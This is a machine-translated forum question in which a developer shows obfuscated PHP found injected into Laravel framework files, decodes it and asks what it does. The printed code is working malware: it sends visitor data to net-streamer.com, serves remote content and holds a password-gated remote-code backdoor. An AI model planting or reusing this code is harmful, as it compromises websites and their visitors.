Php 服务器上添加的新代码位于laravel框架文件中,该文件导致错误
我在为一个客户做一个项目。在服务器上完成并上传了几天后,我的客户机向我显示发生了错误。当我检查这些文件时,我发现在checkformintenancemode.php文件中添加了一段额外的代码 供应商/laravel/framework/Illumb/foundation/http/middleware 那是Php 服务器上添加的新代码位于laravel框架文件中,该文件导致错误,php,laravel,server,web-deployment,backend,Php,Laravel,Server,Web Deployment,Backend,我在为一个客户做一个项目。在服务器上完成并上传了几天后,我的客户机向我显示发生了错误。当我检查这些文件时,我发现在checkformintenancemode.php文件中添加了一段额外的代码 供应商/laravel/framework/Illumb/foundation/http/middleware 那是 //###==### error_reporting(0); $strings = "as";$strings .= "sert"; @$strings(str_rot13('r
//###==###
error_reporting(0);
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("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"));'));
//###==###
经过一些基本的解码后,我发现下面的代码是
if (isset($ibv))
{
echo $ibv;
}
else
{
if(!empty($_COOKIE["client_check"]))die($_COOKIE["client_check"]);
if(!isset($c_["HTTP_ACCEPT_CHARSET"]))
{
$temp = dirname(__FILE__)."/ch";$charset = file_get_contents($temp);
if (!$charset && !isset($_GET["charset"]))
{
$str = file_get_contents("http://".$_SERVER["HTTP_HOST"]."/?charset=1");
if(preg_match("/windows-1251/i", $str)){$charset = "windows-1251";
}
elseif(preg_match("/utf-8/i", $str))
{
$charset = "utf-8";
}
else
{
$charset = "windows-1251";
}
$handle = fopen($temp, "w+");
fwrite($handle, $charset);
fclose($handle);
}
else
{
$charset = "utf-8";
}
$c0 = $charset;
}
else
{
$c0=$c_["HTTP_ACCEPT_CHARSET"];
}
if(function_exists("curl_init"))
{
$c1=curl_init("http://net-streamer.com/get.php?d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&c=".$c0."&i=1&ip=".$_SERVER["REMOTE_ADDR"]."&h=".md5("069a5edfc9e75c4abf03b0608636fe46".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"].$_SERVER["HTTP_USER_AGENT"].$c0."1"));
curl_setopt($c1,42,false);
curl_setopt($c1,19913,true);
$ibv = curl_exec($c1);
curl_close($c1);
}
elseif(ini_get("allow_url_fopen")==1)
{
$ibv = file_get_contents("http://net-streamer.com/get.php?d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&c=".$c0."&i=1&ip=".$_SERVER["REMOTE_ADDR"]."&h=".md5("069a5edfc9e75c4abf03b0608636fe46".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"].$_SERVER["HTTP_USER_AGENT"].$c0."1"));
}
if (isset($ibv))
{
echo $ibv;
}
if(isset($_REQUEST["p"]) && $_REQUEST["p"] == "85bc6cfb")
{
@assert($_REQUEST["c"]);
}
}
但我不明白它的作用和原因。我还看到在public/index.php中添加了相同的类型代码
有人能告诉我为什么要添加它以及它的作用吗?这是ping net-streamer.com,提供了一系列关于您网站的详细信息。可能是广告垃圾软件/间谍软件。但它是如何自动添加的?客户否认了任何其他人对代码进行篡改的事实。不知道。这类事情对于这个网站来说是离题的。这个网站是为了解决编程问题,而不是弄清楚你的服务器是如何/是否被黑客攻击的。同意@MarcB。这是一个更好的适合。服务器可能已被黑客入侵。